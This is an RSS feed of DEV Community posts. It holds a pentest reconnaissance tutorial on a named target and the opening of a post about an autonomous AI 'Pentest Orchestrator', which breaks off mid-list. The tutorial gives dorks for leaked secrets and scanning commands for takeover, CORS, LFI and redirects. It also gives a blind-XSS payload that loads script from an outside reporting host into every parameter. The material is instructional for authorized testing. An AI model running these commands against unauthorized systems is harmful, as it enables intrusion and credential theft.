<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom" xmlns:dc="http://purl.org/dc/elements/1.1/">
  <channel>
    <title>DEV Community: Glenn Rodney</title>
    <description>The latest articles on DEV Community by Glenn Rodney (@rodneys_int).</description>
    <link>https://dev.to/rodneys_int</link>
    
    <atom:link rel="self" type="application/rss+xml" href="https://dev.to/feed/rodneys_int"/>
    <language>en</language>
    <item>
      <title>A Deep Dive into a Real-World Recon Workflow</title>
      <dc:creator>Glenn Rodney</dc:creator>
      <pubDate>Tue, 01 Jul 2025 22:16:43 +0000</pubDate>
      <link>https://dev.to/rodneys_int/a-deep-dive-into-a-real-world-recon-workflow-hpi</link>
      <guid>https://dev.to/rodneys_int/a-deep-dive-into-a-real-world-recon-workflow-hpi</guid>
      <description>&lt;p&gt;So, you've landed the engagement. The scope is defined, the rules of engagement are set, and the target is locked: &lt;strong&gt;GravexLabs&lt;/strong&gt;. You have the name, and that's it. This is the starting point for every offensive security operation, a blank canvas that, through skill and methodology, will be painted into a detailed map of attack surfaces, endpoints, and potential vulnerabilities.&lt;/p&gt;

&lt;p&gt;This isn't just about running a few tools. It's a structured process, a symphony of techniques designed to peel back the layers of a target's digital presence. RAWPA is made for this process. While RAWPA is built to host and guide you through complete pentesting methodologies, today I want to give you something more concrete. I'm going to walk you through my personal, battle-tested reconnaissance workflow.&lt;/p&gt;

&lt;p&gt;This process is so central to my work that I've even streamlined it into a framework called &lt;strong&gt;AAweRT - An Awesome Reconnaissance Tool&lt;/strong&gt; (&lt;a href="https://github.com/Kuwguap/aawert/" rel="noopener noreferrer"&gt;github.com/Kuwguap/aawert/&lt;/a&gt;)&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F6c8jfm8rpuvfokj1mkhx.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F6c8jfm8rpuvfokj1mkhx.png" alt="AAweRT" width="800" height="812"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;which encapsulates the logic we're about to explore. Forget the "get bugs quick" fantasy; this is about building a foundation of deep intelligence for a successful, professional engagement.&lt;/p&gt;

&lt;p&gt;Grab your terminal. Let's begin the hunt.&lt;/p&gt;

&lt;h3&gt;
  
  
  Phase 1: The OSINT Dragnet - Reconnaissance Without Touching
&lt;/h3&gt;

&lt;p&gt;Before we send a single packet to GravexLabs' servers, we gather intelligence from the vast ocean of public information. This is Open-Source Intelligence (OSINT), and it’s the quietest and often most revealing phase.&lt;/p&gt;

&lt;h4&gt;
  
  
  &lt;strong&gt;1.1: Advanced Search Fu: Google and GitHub Dorking&lt;/strong&gt;
&lt;/h4&gt;

&lt;p&gt;Never, ever underestimate the power of a well-crafted search query.&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;Google Dorking:&lt;/strong&gt; We use advanced operators to find what isn't meant to be found.&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;code&gt;site:gravexlabs.com&lt;/code&gt; - The basics, map out the intended public site.&lt;/li&gt;
&lt;li&gt;
&lt;code&gt;site:*.gravexlabs.com -www&lt;/code&gt; - Find all subdomains indexed by Google, excluding the main &lt;code&gt;www&lt;/code&gt; site.&lt;/li&gt;
&lt;li&gt;
&lt;code&gt;inurl:gravexlabs filetype:log&lt;/code&gt; - Hunt for exposed log files.&lt;/li&gt;
&lt;li&gt;
&lt;code&gt;intext:"GravexLabs API Key" | intext:"GravexLabs password"&lt;/code&gt; - The long shots that sometimes pay off spectacularly.&lt;/li&gt;
&lt;/ul&gt;


&lt;/li&gt;

&lt;li&gt;

&lt;p&gt;&lt;strong&gt;GitHub Dorking:&lt;/strong&gt; This is non-negotiable for any modern company. Developers make mistakes, and public repositories can be a goldmine of leaked secrets.&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;code&gt;"gravexlabs.com" password&lt;/code&gt; - Search for hardcoded passwords related to the domain.&lt;/li&gt;
&lt;li&gt;
&lt;code&gt;"gravexlabs.com" api_key&lt;/code&gt; - Hunt for API keys.&lt;/li&gt;
&lt;li&gt;
&lt;code&gt;"gravexlabs.com" filename:config.js&lt;/code&gt; - Look for configuration files.&lt;/li&gt;
&lt;li&gt;
&lt;code&gt;"gravexlabs.com" filename:.env&lt;/code&gt; - Search for leaked environment files, which often contain database credentials, secret keys, and more.&lt;/li&gt;
&lt;/ul&gt;


&lt;/li&gt;

&lt;/ul&gt;

&lt;h4&gt;
  
  
  &lt;strong&gt;1.2: Mapping the Infrastructure: ASN, crt.sh, and Censys&lt;/strong&gt;
&lt;/h4&gt;

&lt;p&gt;Next, we map the physical and logical infrastructure.&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;ASN Lookup:&lt;/strong&gt; We identify GravexLabs' Autonomous System Number (ASN) using &lt;code&gt;whois&lt;/code&gt; on their domain's IP. This ASN is their unique identifier on the internet. With the ASN, we can query BGP data to find all IP ranges they own. This is our hunting ground.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;Certificate Transparency (crt.sh):&lt;/strong&gt; Every time an SSL/TLS certificate is issued, it's logged publicly. Searching &lt;code&gt;crt.sh&lt;/code&gt; for &lt;code&gt;%.gravexlabs.com&lt;/code&gt; gives us a historical and current list of subdomains. This often reveals internal, staging, or forgotten assets that are still live.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;Censys.io:&lt;/strong&gt; Think of Censys as a search engine for the devices and networks that make up the internet. We can search for GravexLabs' ASN or known IP ranges to get a bird's-eye view of their open ports and running services across their entire infrastructure, often identifying services without needing to scan them directly ourselves.&lt;/p&gt;&lt;/li&gt;
&lt;/ul&gt;

&lt;h3&gt;
  
  
  Phase 2: The Command Line Unleashed - A Live-Fire Methodology
&lt;/h3&gt;

&lt;p&gt;With our passive intelligence gathered, it's time to get our hands dirty. The following is a highly effective, tool-driven workflow that forms the core of my &lt;code&gt;AAweRT&lt;/code&gt; framework. It's designed for efficiency and depth, moving logically from broad discovery to specific vulnerability probing.&lt;/p&gt;

&lt;h4&gt;
  
  
  &lt;strong&gt;2.1: Mass Subdomain Discovery&lt;/strong&gt;
&lt;/h4&gt;

&lt;p&gt;Our OSINT work gave us a good starting list, but it's not exhaustive. We now use &lt;code&gt;subfinder&lt;/code&gt; to actively and passively enumerate every possible subdomain.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;subfinder &lt;span class="nt"&gt;-dL&lt;/span&gt; domains.txt &lt;span class="nt"&gt;-all&lt;/span&gt; &lt;span class="nt"&gt;-recursive&lt;/span&gt; &lt;span class="nt"&gt;-o&lt;/span&gt; subdomains.txt
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;ul&gt;
&lt;li&gt;&lt;p&gt;&lt;code&gt;subfinder -dL domains.txt&lt;/code&gt;: We feed it a file (&lt;code&gt;domains.txt&lt;/code&gt;) containing our root domain (&lt;code&gt;gravexlabs.com&lt;/code&gt;).&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;&lt;code&gt;-all&lt;/code&gt;: This is crucial. It tells &lt;code&gt;subfinder&lt;/code&gt; to use all its available passive sources (like crt.sh, Virustotal, etc.).&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;&lt;code&gt;-recursive&lt;/code&gt;: If it finds &lt;code&gt;dev.gravexlabs.com&lt;/code&gt;, it will then search for subdomains of that, like &lt;code&gt;api.dev.gravexlabs.com&lt;/code&gt;. This is how you find deep, forgotten assets.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;&lt;code&gt;-o subdomains.txt&lt;/code&gt;: We save our massive list of findings for the next step.&lt;/p&gt;&lt;/li&gt;
&lt;/ul&gt;

&lt;h4&gt;
  
  
  &lt;strong&gt;2.2: Probing for Life&lt;/strong&gt;
&lt;/h4&gt;

&lt;p&gt;We have a list of hundreds, maybe thousands, of potential subdomains. Are they alive? Are they hosting web services? &lt;code&gt;httpx-toolkit&lt;/code&gt; answers this with blistering speed.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="nb"&gt;cat &lt;/span&gt;subdomains.txt | httpx-toolkit &lt;span class="nt"&gt;-ports&lt;/span&gt; 443,80,8080,8000,8888 &lt;span class="nt"&gt;-threads&lt;/span&gt; 200 &lt;span class="nt"&gt;-o&lt;/span&gt; subdomains_alive.txt
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;ul&gt;
&lt;li&gt;&lt;p&gt;&lt;code&gt;cat subdomains.txt&lt;/code&gt; |: We pipe our list directly into &lt;code&gt;httpx-toolkit&lt;/code&gt;.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;&lt;code&gt;-ports 443,80,8080,8000,8888&lt;/code&gt;: We focus on the most common HTTP/HTTPS ports. This is a strategic choice to balance speed and coverage.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;&lt;code&gt;-threads 200&lt;/code&gt;: We crank up the concurrency for speed. Adjust this based on your machine and network.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;&lt;code&gt;-o subdomains_alive.txt&lt;/code&gt;: The output is a clean list of live web servers, ready for deeper inspection.&lt;/p&gt;&lt;/li&gt;
&lt;/ul&gt;

&lt;h4&gt;
  
  
  &lt;strong&gt;2.3: Mapping the Digital Attack Surface with Katana&lt;/strong&gt;
&lt;/h4&gt;

&lt;p&gt;Now we know what's live. The next question is what's on it? &lt;code&gt;katana&lt;/code&gt;, a web crawler on steroids, will spider these sites to find endpoints, JavaScript files, and other interesting paths.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;katana &lt;span class="nt"&gt;-u&lt;/span&gt; subdomains_alive.txt &lt;span class="nt"&gt;-d&lt;/span&gt; 5 &lt;span class="nt"&gt;-pss&lt;/span&gt; waybackarchive,commoncrawl,alienvault &lt;span class="nt"&gt;-kf&lt;/span&gt; &lt;span class="nt"&gt;-jc&lt;/span&gt; &lt;span class="nt"&gt;-fx&lt;/span&gt; &lt;span class="nt"&gt;-ef&lt;/span&gt; woff,css,png,svg,jpg,woff2,jpeg,gif &lt;span class="nt"&gt;-o&lt;/span&gt; allurls.txt
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;ul&gt;
&lt;li&gt;&lt;p&gt;&lt;code&gt;-u subdomains_alive.txt&lt;/code&gt;: We feed it our list of live hosts.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;&lt;code&gt;-d 5&lt;/code&gt;: We set a crawl depth of 5 levels.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;&lt;code&gt;-pss waybackarchive,commoncrawl,alienvault&lt;/code&gt;: This is pure gold. It tells katana to not only crawl the live site but also pull historical URLs from passive sources like the Wayback Machine. This finds endpoints that may no longer be linked but still exist.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;&lt;code&gt;-kf&lt;/code&gt;: Also crawl for known files (e.g., .git-config, .env).&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;&lt;code&gt;-jc&lt;/code&gt;: Parse JavaScript files for hidden paths and endpoints.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;&lt;code&gt;-fx -ef ...&lt;/code&gt;: We filter out uninteresting file extensions like fonts and images to keep our output clean and focused on actionable URLs.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;&lt;code&gt;-o allurls.txt&lt;/code&gt;: All discovered URLs are saved. This file is now our primary source for vulnerability hunting.&lt;/p&gt;&lt;/li&gt;
&lt;/ul&gt;

&lt;h4&gt;
  
  
  Phase 3: Analysis &amp;amp; Initial Vulnerability Scanning
&lt;/h4&gt;

&lt;p&gt;With a huge list of URLs, we can begin our automated, targeted analysis.&lt;/p&gt;

&lt;h4&gt;
  
  
  &lt;strong&gt;3.1: The Hunt for Leaks and Secrets&lt;/strong&gt;
&lt;/h4&gt;

&lt;p&gt;The first quick win is to search our URL list for files that should never be public.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="nb"&gt;cat &lt;/span&gt;allurls.txt | &lt;span class="nb"&gt;grep&lt;/span&gt; &lt;span class="nt"&gt;-E&lt;/span&gt; &lt;span class="s2"&gt;"&lt;/span&gt;&lt;span class="se"&gt;\.&lt;/span&gt;&lt;span class="s2"&gt;txt|&lt;/span&gt;&lt;span class="se"&gt;\.&lt;/span&gt;&lt;span class="s2"&gt;log|&lt;/span&gt;&lt;span class="se"&gt;\.&lt;/span&gt;&lt;span class="s2"&gt;cache|&lt;/span&gt;&lt;span class="se"&gt;\.&lt;/span&gt;&lt;span class="s2"&gt;secret|&lt;/span&gt;&lt;span class="se"&gt;\.&lt;/span&gt;&lt;span class="s2"&gt;db|&lt;/span&gt;&lt;span class="se"&gt;\.&lt;/span&gt;&lt;span class="s2"&gt;backup|&lt;/span&gt;&lt;span class="se"&gt;\.&lt;/span&gt;&lt;span class="s2"&gt;yml|&lt;/span&gt;&lt;span class="se"&gt;\.&lt;/span&gt;&lt;span class="s2"&gt;json|&lt;/span&gt;&lt;span class="se"&gt;\.&lt;/span&gt;&lt;span class="s2"&gt;gz|&lt;/span&gt;&lt;span class="se"&gt;\.&lt;/span&gt;&lt;span class="s2"&gt;rar|&lt;/span&gt;&lt;span class="se"&gt;\.&lt;/span&gt;&lt;span class="s2"&gt;zip|&lt;/span&gt;&lt;span class="se"&gt;\.&lt;/span&gt;&lt;span class="s2"&gt;config"&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;This simple &lt;code&gt;grep&lt;/code&gt; command filters our massive URL list for common sensitive file extensions. Finding a &lt;code&gt;.log&lt;/code&gt;, &lt;code&gt;.backup&lt;/code&gt;, or &lt;code&gt;.config&lt;/code&gt; file can often lead to immediate information disclosure.&lt;/p&gt;

&lt;h4&gt;
  
  
  &lt;strong&gt;3.2: JavaScript Recon and Exposure Scanning&lt;/strong&gt;
&lt;/h4&gt;

&lt;p&gt;JavaScript files are a treasure map of application logic. We first isolate them and then run specialized scans.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="nb"&gt;cat &lt;/span&gt;allurls.txt | &lt;span class="nb"&gt;grep&lt;/span&gt; &lt;span class="nt"&gt;-E&lt;/span&gt; &lt;span class="s2"&gt;"&lt;/span&gt;&lt;span class="se"&gt;\.&lt;/span&gt;&lt;span class="s2"&gt;js$"&lt;/span&gt; &lt;span class="o"&gt;&amp;gt;&amp;gt;&lt;/span&gt; js.txt
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;





&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="nb"&gt;cat &lt;/span&gt;js.txt | nuclei &lt;span class="nt"&gt;-t&lt;/span&gt; ~/nuclei-templates/http/exposures/ &lt;span class="nt"&gt;-c&lt;/span&gt; 30
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;ul&gt;
&lt;li&gt;&lt;p&gt;First, we &lt;code&gt;grep&lt;/code&gt; all URLs ending in .js into a dedicated file.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;Then, we feed this list to &lt;code&gt;nuclei&lt;/code&gt;, a powerful pattern-based scanner. We use the &lt;code&gt;exposures&lt;/code&gt; templates, which are specifically designed to find things like API keys, secrets, and sensitive information accidentally hardcoded in JavaScript files.&lt;/p&gt;&lt;/li&gt;
&lt;/ul&gt;

&lt;h4&gt;
  
  
  &lt;strong&gt;3.3: Checking for Subdomain Takeover&lt;/strong&gt;
&lt;/h4&gt;

&lt;p&gt;A common misconfiguration is a DNS CNAME record pointing to a service (like an S3 bucket or a GitHub page) that has been de-provisioned. If we can re-register that service, we can take over the subdomain. &lt;code&gt;subzy&lt;/code&gt; automates this check.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;subzy run &lt;span class="nt"&gt;--targets&lt;/span&gt; subdomains.txt &lt;span class="nt"&gt;--concurrency&lt;/span&gt; 100 &lt;span class="nt"&gt;--hide_fails&lt;/span&gt; &lt;span class="nt"&gt;--verify_ssl&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;This tool quickly checks our full subdomain list for fingerprints of services vulnerable to takeover. A single finding here can lead to a critical vulnerability.&lt;/p&gt;

&lt;h3&gt;
  
  
  &lt;strong&gt;3.4: Probing for CORS Misconfigurations&lt;/strong&gt;
&lt;/h3&gt;

&lt;p&gt;Cross-Origin Resource Sharing (CORS) misconfigurations can allow a malicious website to make requests to the target application on behalf of a user. We attack this in two ways.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;python3 corsy.py &lt;span class="nt"&gt;-i&lt;/span&gt; subdomains_alive.txt &lt;span class="nt"&gt;-t&lt;/span&gt; 10 &lt;span class="nt"&gt;--headers&lt;/span&gt; &lt;span class="s2"&gt;"User-Agent: Googlebot&lt;/span&gt;&lt;span class="se"&gt;\n&lt;/span&gt;&lt;span class="s2"&gt;Cookie: SESSION=Hacked"&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;





&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;nuclei &lt;span class="nt"&gt;-l&lt;/span&gt; subdomains_alive.txt &lt;span class="nt"&gt;-t&lt;/span&gt; ~/nuclei-templates/http/cors/ &lt;span class="nt"&gt;-c&lt;/span&gt; 30
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;ul&gt;
&lt;li&gt;&lt;p&gt;&lt;code&gt;corsy&lt;/code&gt;: This specialized tool sends probes with various Origin headers to test CORS policies. We add custom headers to mimic other scenarios.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;&lt;code&gt;nuclei&lt;/code&gt;: We then run Nuclei's dedicated CORS templates for a second, comprehensive check against known misconfigurations.&lt;/p&gt;&lt;/li&gt;
&lt;/ul&gt;

&lt;h3&gt;
  
  
  Phase 4: Active Probing for Common Vulnerabilities
&lt;/h3&gt;

&lt;p&gt;This is a chained command for maximum efficiency.&lt;/p&gt;

&lt;h3&gt;
  
  
  &lt;strong&gt;4.1: XSS (Cross-Site Scripting)&lt;/strong&gt;
&lt;/h3&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;subfinder &lt;span class="nt"&gt;-d&lt;/span&gt; gravexlabs.com | httpx-toolkit &lt;span class="nt"&gt;-silent&lt;/span&gt; | katana &lt;span class="nt"&gt;-ps&lt;/span&gt; &lt;span class="nt"&gt;-f&lt;/span&gt; qurl | gf xss | bxss &lt;span class="nt"&gt;-appendMode&lt;/span&gt; &lt;span class="nt"&gt;-payload&lt;/span&gt; &lt;span class="s1"&gt;'"&amp;gt;&amp;lt;script src=[https://xss.report/c/kuwguap](https://xss.report/c/kuwguap)&amp;gt;&amp;lt;/script&amp;gt;'&lt;/span&gt; &lt;span class="nt"&gt;-parameters&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Let's break it down:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;&lt;p&gt;&lt;code&gt;subfinder | httpx-toolkit | katana&lt;/code&gt;: We find, validate, and crawl for URLs in one go.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;&lt;code&gt;| gf xss&lt;/code&gt;: We pipe the URLs to &lt;code&gt;gf&lt;/code&gt; (grep-friend). Using its &lt;code&gt;xss&lt;/code&gt; patterns, it filters for URLs that have parameters likely to be vulnerable to XSS (e.g., &lt;code&gt;?redirect=&lt;/code&gt;, &lt;code&gt;?q=&lt;/code&gt;, &lt;code&gt;?next=&lt;/code&gt;).&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;&lt;code&gt;| bxss&lt;/code&gt;: This final pipe sends the highly-qualified URLs to &lt;code&gt;bxss&lt;/code&gt;, which automates the testing by injecting our custom payload (which points to an XSS reporting service) into every parameter.&lt;/p&gt;&lt;/li&gt;
&lt;/ul&gt;

&lt;h3&gt;
  
  
  &lt;strong&gt;4.2: LFI (Local File Inclusion) &amp;amp; Open Redirects&lt;/strong&gt;
&lt;/h3&gt;

&lt;p&gt;We use a similar &lt;code&gt;gf&lt;/code&gt;-powered methodology for other bug classes.&lt;/p&gt;

&lt;h1&gt;
  
  
  LFI
&lt;/h1&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="nb"&gt;cat &lt;/span&gt;allurls.txt | gf lfi | nuclei &lt;span class="nt"&gt;-t&lt;/span&gt; ~/nuclei-templates/http/vulnerabilities/lfi/
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h1&gt;
  
  
  Open Redirect
&lt;/h1&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="nb"&gt;cat &lt;/span&gt;allurls.txt | gf redirect | openredirex &lt;span class="nt"&gt;-p&lt;/span&gt; payloads.txt
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;For LFI, we find potential patterns with &lt;code&gt;gf&lt;/code&gt; and then use Nuclei's powerful LFI templates to attempt exploitation safely.&lt;/p&gt;

&lt;p&gt;For Open Redirects, we find potential URLs with &lt;code&gt;gf&lt;/code&gt; and then use &lt;code&gt;openredirex&lt;/code&gt; with a list of crafted payloads to confirm the vulnerability.&lt;/p&gt;

&lt;h3&gt;
  
  
  &lt;strong&gt;4.3: CRLF Injection&lt;/strong&gt;
&lt;/h3&gt;

&lt;p&gt;CRLF injection can lead to response splitting and other attacks. Nuclei has excellent templates for this.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="nb"&gt;cat &lt;/span&gt;subdomains_alive.txt | nuclei &lt;span class="nt"&gt;-t&lt;/span&gt; ~/nuclei-templates/http/vulnerabilities/crlf-injection.yaml &lt;span class="nt"&gt;-v&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;We feed our live hosts directly to Nuclei and let its specialized template handle the complex injection tests.&lt;/p&gt;

&lt;h3&gt;
  
  
  &lt;strong&gt;4.4: Server-Specific Checks: IIS Short Filename&lt;/strong&gt;
&lt;/h3&gt;

&lt;p&gt;If we identify a Microsoft IIS server, we run a specialized check. The "short filename" vulnerability can allow an attacker to guess the names of hidden files and folders.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;shortscan &lt;span class="o"&gt;[&lt;/span&gt;https://iis.gravexlabs.com]&lt;span class="o"&gt;(&lt;/span&gt;https://iis.gravexlabs.com&lt;span class="o"&gt;)&lt;/span&gt; &lt;span class="nt"&gt;-F&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;code&gt;shortscan&lt;/code&gt; is the perfect tool for this, automating the entire guessing process.&lt;/p&gt;

&lt;h3&gt;
  
  
  &lt;strong&gt;The Culmination: From a Name to a Blueprint&lt;/strong&gt;
&lt;/h3&gt;

&lt;p&gt;Look at what we've accomplished. We started with a name, "GravexLabs," and now we have a blueprint for a full-scale offensive operation. We have a list of live assets, their technologies, mapped endpoints, and a prioritized list of potential vulnerabilities including information leaks, subdomain takeovers, CORS issues, XSS, LFI, and more.&lt;/p&gt;

&lt;p&gt;This is the power of a structured, tool-assisted methodology. It's repeatable, scalable, and incredibly effective. This entire workflow, and many others, are what I've aimed to codify and simplify with my AAweRT framework. For those looking to explore even more complex, hierarchical methodologies for every stage of a penetration test, platforms like RAWPA are designed to provide that interactive guidance.&lt;br&gt;
&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fq9meed65c7abo5cok55e.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fq9meed65c7abo5cok55e.png" alt="AAweRT" width="800" height="378"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;The hunt is complete. The real attack can now begin. Business Logic flaws, Authorization and Privilege Escalation Flaws, Workflow and State Manipulation Bypasses, Feature and Functionality Abuse and more.&lt;/p&gt;

</description>
    </item>
    <item>
      <title>My Pentesting AI Learned a New Word: Orchestrate.</title>
      <dc:creator>Glenn Rodney</dc:creator>
      <pubDate>Tue, 01 Jul 2025 22:14:24 +0000</pubDate>
      <link>https://dev.to/rodneys_int/my-pentesting-ai-learned-a-new-word-orchestrate-4bp3</link>
      <guid>https://dev.to/rodneys_int/my-pentesting-ai-learned-a-new-word-orchestrate-4bp3</guid>
      <description>&lt;p&gt;Hey everyone, Kuwguap here.&lt;/p&gt;

&lt;p&gt;It’s been a minute(literally just a day or two lol) since we last talked about the journey with RAWPA. The feedback has been amazing, and watching the community engage with the tool has been the most rewarding part of this whole process. Gained 30 users and about 30% of them active daily. But a question has been nagging at me, keeping me up at night: &lt;em&gt;How can I push this further? How can RAWPA help the cybersecurity community even more?&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;I kept coming back to one word: &lt;strong&gt;Orchestrate&lt;/strong&gt;.&lt;/p&gt;

&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;orchestrate&lt;/strong&gt; - &lt;em&gt;plan or coordinate the elements of (a situation) to produce a desired effect, especially surreptitiously.&lt;/em&gt;&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;That’s it. That’s the next step. It’s not enough for an AI to just suggest pathways; it needs to &lt;em&gt;coordinate the elements&lt;/em&gt;. It needs to be an orchestrator. And from that idea, the next major feature for RAWPA was born: the &lt;strong&gt;Pentest Orchestrator&lt;/strong&gt;.&lt;/p&gt;

&lt;h3&gt;
  
  
  Not My First Rodeo with Automation
&lt;/h3&gt;

&lt;p&gt;Some of you might know about another tool I built called &lt;strong&gt;AAweRT&lt;/strong&gt; (An Awesome Reconnaissance Tool). It’s a Bash-based framework I created to automate a ton of the initial information-gathering stages.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F6c8jfm8rpuvfokj1mkhx.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F6c8jfm8rpuvfokj1mkhx.png" alt="AAweRT" width="800" height="812"&gt;&lt;/a&gt;&lt;br&gt;
&lt;em&gt;(For anyone interested, AAweRT is open-source on &lt;a href="https://github.com/Kuwguap/aawert/" rel="noopener noreferrer"&gt;GitHub&lt;/a&gt;, and I'll be doing a deep-dive on it soon over at my personal blog, &lt;a href="https://kuwguap.github.io/" rel="noopener noreferrer"&gt;Rodney's Intuition&lt;/a&gt;).&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;AAweRT is great for automated recon, but what I’m building now is on a different level. The Pentest Orchestrator isn't just a sequence of scripts; it's a thinking, adaptive agent.&lt;/p&gt;
&lt;h3&gt;
  
  
  What Makes the RAWPA Orchestrator Different?
&lt;/h3&gt;

&lt;p&gt;This isn't just AAweRT with a new coat of paint. The Orchestrator is a goal-oriented AI agent that builds upon RAWPA’s neural pathway foundation.&lt;/p&gt;

&lt;p&gt;Here’s the breakdown:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Massive Toolchain:&lt;/strong&gt; It leverages &lt;strong&gt;19 integrated pentesting tools&lt;/strong&gt; (and counting!) to conduct a deep and detailed analysis of a target. This isn't just subdomain enumeration; we're talking full-spectrum vulnerability scanning and analysis.&lt;/li&gt;
&lt;li&gt;
